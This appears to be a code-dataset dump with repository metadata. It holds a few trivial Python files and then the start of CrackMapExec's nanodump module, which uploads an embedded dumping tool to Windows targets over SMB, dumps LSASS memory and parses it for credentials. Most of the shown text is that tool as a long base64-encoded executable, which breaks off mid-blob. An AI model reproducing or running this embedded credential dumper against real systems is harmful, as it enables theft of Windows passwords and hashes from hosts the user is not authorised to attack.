] | null | null | null | py/__init__.py | iirthw/quick_tracer | 23ac768c029bef0183b3736b6c9c08b66efd0588 | [
"MIT"
] | null | null | null | # TODO: implement __init__.py | 29 | 29 | 0.793103 | 4 | 29 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.730769 | 0.931034 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 1 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
036dcc65c3792ebfe7de4bae2881c1a3079038f4 | 224 | py | Python | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | 1 | 2017-11-19T13:35:34.000Z | 2017-11-19T13:35:34.000Z | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | 3 | 2020-02-11T23:39:00.000Z | 2021-06-10T19:12:20.000Z | src/trader/base.py | edse/bl3ptrader | 40c83751f2b854e9a5d0f915dce7fd84dc9d7233 | [
"MIT"
] | null | null | null | from .constants import * # noqa
from .logger import * # noqa
# logger = logging.getLogger('bl3ptrader')
# logger.setLevel(logging.DEBUG)
# ch = logging.StreamHandler()
# ch.setLevel(logging.DEBUG)
# logger.addHandler(ch)
| 24.888889 | 42 | 0.727679 | 26 | 224 | 6.269231 | 0.5 | 0.122699 | 0.245399 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0.129464 | 224 | 8 | 43 | 28 | 0.830769 | 0.709821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0372f0c38bed62f61c61a37010908d027a1e45cd | 289 | py | Python | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 4 | 2020-10-14T15:01:02.000Z | 2021-09-30T14:17:26.000Z | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 1 | 2021-04-30T14:29:53.000Z | 2021-05-01T07:21:33.000Z | rucio_jupyterlab/tests/mocks/mock_handler.py | didithilmy/rucio-jupyterlab | ad2db1344bb433a466696cde51aa787cd3b23237 | [
"BSD-3-Clause"
] | 1 | 2020-07-31T19:57:24.000Z | 2020-07-31T19:57:24.000Z | class MockHandler:
def finish(*args, **kwargs):
pass
def current_user(*args, **kwargs):
return None
def get_json_body(*args, **kwargs):
pass
def get_query_argument(*args, **kwargs):
pass
def set_status(*args, **kwargs):
pass
| 18.0625 | 44 | 0.574394 | 34 | 289 | 4.705882 | 0.529412 | 0.3125 | 0.35 | 0.31875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.301038 | 289 | 15 | 45 | 19.266667 | 0.792079 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | true | 0.363636 | 0 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
ceea4a5be3b247ca2a7fcf6e785d602704c1f873 | 81 | py | Python | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | src/cmder/__init__.py | iBiology/cmder | 2a0a7bf44d053fc2f6714e080a1ad3a91043ec5a | [
"MIT"
] | null | null | null | from .cmder import run
from .cmder import CMD_LINE_LENGTH
from .cmder import PMT
| 20.25 | 34 | 0.814815 | 14 | 81 | 4.571429 | 0.571429 | 0.421875 | 0.703125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 81 | 3 | 35 | 27 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
cef6e62fb008fde842ffd535aded9c12251ea9b8 | 27 | py | Python | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | 1 | 2022-01-24T18:37:13.000Z | 2022-01-24T18:37:13.000Z | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | null | null | null | backendpy/__init__.py | savangco/backendpy | c6dfd18d9196fac60de517117fc1020d2d168a57 | [
"BSD-3-Clause"
] | null | null | null | from .asgi import Backendpy | 27 | 27 | 0.851852 | 4 | 27 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3037f7257e3b9adfe75b6de5dcaea006310fcfee | 84,111 | py | Python | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | 3 | 2021-10-31T14:50:29.000Z | 2022-02-27T16:30:30.000Z | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | null | null | null | cme/modules/nanodump.py | retr0-13/CrackMapExec | e9bcd09bd2c862200a40ecdc431fcf56f0ae5b67 | [
"BSD-2-Clause"
] | 1 | 2022-03-20T22:09:54.000Z | 2022-03-20T22:09:54.000Z | # nanodump module for CME python3
# author of the module : github.com/mpgn
# nanodump: https://github.com/helpsystems/nanodump
from io import StringIO
import os
import sys
import re
import time
import base64
class CMEModule:
name = 'nanodump'
description = "Get lsass dump using nanodump and parse the result with pypykatz"
supported_protocols = ['smb']
opsec_safe = True # not really
multiple_hosts = True
def options(self, context, module_options):
'''
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/shared/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
'''
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.nano_embeded = base64.b64decode("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tFzEiYSI2VUP///0gBwotFnIkCg0XMBItFzEiYSI2VUP///0gBwotFoIkCg0XMBItFzEiYSI2VUP///0gBwotFpIkCg0XMBItFzEiYSI2VUP///0gBwotFqIkCg0XMBItFzEiYSI2VUP///0gBwg+3RaxmiQKDRcwCi0XMSJhIjZVQ////SAHCD7dFrmaJAoNFzAKLRcxImEiNlVD///9IAcJIi0WwSIkCg0XMCItFzEiYSI2VUP///0gBwkiLRbhIiQKDRcwISItFEItAEImFTP///4tVjEiNhVD///9BidBIicJIi00Q6KL1//9IjUWMQbkEAAAASYnAuiQAAABIi00Q6D71//9IjYVM////QbkEAAAASYnAuigAAABIi00Q6CD1//9Ii0UQi0AQiYVI////SItF0A+3AA+3wImFRP///0iNhUT///9BuAQAAABIicJIi00Q6DP1//9Ii0XQD7cAD7fQSItF0EiLQAhBidBIicJIi00Q6BL1//+LhUz///+DwBhIjZVI////QbkEAAAASYnQicJIi00Q6KX0//+4AQAAAEiBxOAAAABdw1VIieVIg+xwSIlNEMdF/AAAAABIjVXAi0X8SMdEJCAAAAAAQbkwAAAASYnQicJIi00Q6DXu//+JRfiDffgAeRiLRfiJwkiNDa2pAADoaOz//7gAAAAA6wRIi0XISIPEcF3DVUiB7AADAABIjawkgAAAAEiJjZACAABIiZWYAgAARImFoAIAAESJjagCAABIx4V4AgAAAAAAAMeFdAIAAAAAAABIi42QAg
AA6FH///9IiYVYAgAASIO9WAIAAAB1CrgAAAAA6cQEAABmx4VWAgAACABIi4VYAgAASIPAGEiJhUgCAABID7+NVgIAAEiNlRgCAABIi4VIAgAASMdEJCAAAAAASYnJSYnQSInCSIuNkAIAAOiT7P//iYVEAgAAgb1EAgAADQAAgHUTg72oAgAAAHUKuAAAAADpUAQAAIO9RAIAAAB5HouFRAIAAInCSI0N46gAAOhe6///uAAAAADpKQQAAEiLhRgCAABIg8AgSImFOAIAAEgPv41WAgAASI2VEAIAAEiLhTgCAABIx0QkIAAAAABJiclJidBIicJIi42QAgAA6AHs//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDXCoAADo6+r//7gAAAAA6bYDAABIi4UQAgAASImFMAIAAGbHhXICAAAAAOlYAwAASIuFEAIAAEiNlbABAABIx0QkIAAAAABBuVgAAABJidBIicJIi42QAgAA6Inr//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDfinAADoc+r//7gAAAAA6T4DAADHhWwCAAAAAAAAx4VoAgAAAAAAAOmzAgAAi4VoAgAASJhIjRTFAAAAAEiLhZgCAABIAdBIiwC6/wAAAEiJweiGJgAAZomFLgIAAA+/hS4CAACNFAAPt4X4AQAAD7fAOcIPhV4CAACDvWwCAAAAD4WBAAAASI1FsEG4AAIAALoAAAAASInB6Kd0AAAPt4X4AQAAD7fISIuFAAIAAEiNVbBIx0QkIAAAAABJiclJidBIicJIi42QAgAA6J/q//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDQ6nAADoien//7gAAAAA6VQCAADHhWwCAAABAAAAi4VoAgAASJhIjRTFAAAAAEiLhZgCAABIAdBIiwBIjVWwSInBSIsFqvcAAP/QhcAPhZwBAACLhWgCAABImEiNFMUAAAAASIuFmAIAAEgB0EiLAEiNFdCmAABIicFIiwVy9wAA/9CFwHUKx4V0AgAAAQAAAEiLBUP2AAD/0EG4GAEAALoIAAAASInBSIsFPPYAAP/QSImFIAIAAEiDvSACAAAAdSdIiwUK9gAA/9BBicC6GAEAAEiNDfGjAADotOj//7gAAAAA6X8BAABIi4UgAgAASMcAAAAAAEiLldABAABIi4UgAgAASIlQCIuV4AEAAEiLhSACAACJUBAPt4XoAQAAD7fQSIuFIAIAAEiNSBRIi4XwAQAASMdEJCAAAAAASYnRSYnISInCSIuNkAIAAOgz6f//iYVEAgAAg71EAgAAAHkei4VEAgAAicJIjQ2ipQAA6B3o//+4AAAAAOnoAAAASIO9eAIAAAB1EEiLhSACAABIiYV4AgAA60FIi4V4AgAASImFYAIAAOsRSIuFYAIAAEiLAEiJhWACAABIi4VgAgAASIsASIXAdeBIi4VgAgAASIuVIAIAAEiJEA+3hXICAACDwAFmiYVyAgAA6wGQg4VoAgAAAYuFaAIAADuFoAIAAA+MO/3//0iLhbABAABIiYUQAgAASIuFEAIAAEg5hTACAAB0FQ+/hXICAAA5haACAAAPj5X8///rAZCDvagCAAAAdByDvXQCAAAAdRNIjQ0OpQAA6Dnn//+4AAAAAOsHSIuFeAIAAEiBx